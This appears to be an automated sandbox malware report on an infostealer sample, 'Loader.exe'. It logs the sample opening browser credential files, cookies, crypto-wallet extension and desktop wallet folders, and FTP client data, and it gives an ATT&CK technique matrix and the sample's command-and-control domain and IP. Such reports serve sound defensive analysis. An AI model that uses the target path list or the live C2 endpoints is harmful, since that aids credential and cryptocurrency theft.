              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7408, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7408, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Screen Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory241
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares41
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS1
              Process Discovery
              Distributed Component Object Model2
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials33
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Loader.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://undesirabkel.click/apibV7RydFqE=100%Avira URL Cloudmalware
              https://undesirabkel.click:443/apiG100%Avira URL Cloudmalware
              undesirabkel.click100%Avira URL Cloudmalware
              https://undesirabkel.click/api100%Avira URL Cloudmalware
              https://undesirabkel.click/apiC100%Avira URL Cloudmalware
              https://undesirabkel.click/100%Avira URL Cloudmalware
              https://undesirabkel.click/apii100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              undesirabkel.click
              104.21.30.13
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                undesirabkel.clicktrue
                • Avira URL Cloud: malware
                unknown
                scentniej.buzzfalse
                  high
                  rebuildeso.buzzfalse
                    high
                    appliacnesot.buzzfalse
                      high
                      screwamusresz.buzzfalse
                        high
                        https://undesirabkel.click/apitrue
                        • Avira URL Cloud: malware
                        unknown
                        cashfuzysao.buzzfalse
                          high
                          inherineau.buzzfalse
                            high
                            prisonyfork.buzzfalse
                              high
                              hummskitnj.buzzfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabLoader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://undesirabkel.click:443/apiGLoader.exe, 00000003.00000003.1852907348.0000000005954000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgLoader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&kLoader.exe, 00000003.00000003.1806230046.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1806503830.000000000343E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLoader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://undesirabkel.click/apibV7RydFqE=Loader.exe, 00000003.00000003.1810035314.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1809849509.000000000340C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1810109813.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1835602520.0000000003416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Loader.exe, 00000003.00000003.1714565206.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760947199.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1761076038.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714647625.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760850531.0000000005987000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Loader.exe, 00000003.00000003.1714565206.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760947199.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1761076038.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714647625.0000000005987000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760850531.0000000005987000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://undesirabkel.click/Loader.exe, 00000003.00000003.1882356018.0000000003416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://undesirabkel.click/apiCLoader.exe, 00000003.00000003.1902857262.000000000336C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1903575535.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.1904716370.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000003.00000003.1783776479.000000000343F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLoader.exe, 00000003.00000003.1714647625.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.microsofLoader.exe, 00000003.00000003.1714565206.00000000059D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000003.00000003.1782474566.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLoader.exe, 00000003.00000003.1714647625.0000000005962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000003.00000003.1783483872.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000003.00000003.1713758282.000000000597B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1713833119.0000000005979000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714012603.0000000005979000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://undesirabkel.click/apicLoader.exe, 00000003.00000003.1882184319.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881885413.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1853019894.000000000340C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882356018.0000000003416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://undesirabkel.click/apiiLoader.exe, 00000003.00000003.1882184319.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881885413.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1853019894.000000000340C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Loader.exe, 00000003.00000003.1806230046.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1806503830.000000000343E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1783747043.000000000343E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.30.13
                                                                                          undesirabkel.clickUnited States
                                                                                          13335CLOUDFLARENETUStrue
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1581511
                                                                                          Start date and time:2024-12-27 23:26:06 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 3m 48s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Loader.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@6/1@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 66.7%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 98%
                                                                                          • Number of executed functions: 56
                                                                                          • Number of non-executed functions: 169
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Stop behavior analysis, all processes terminated
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
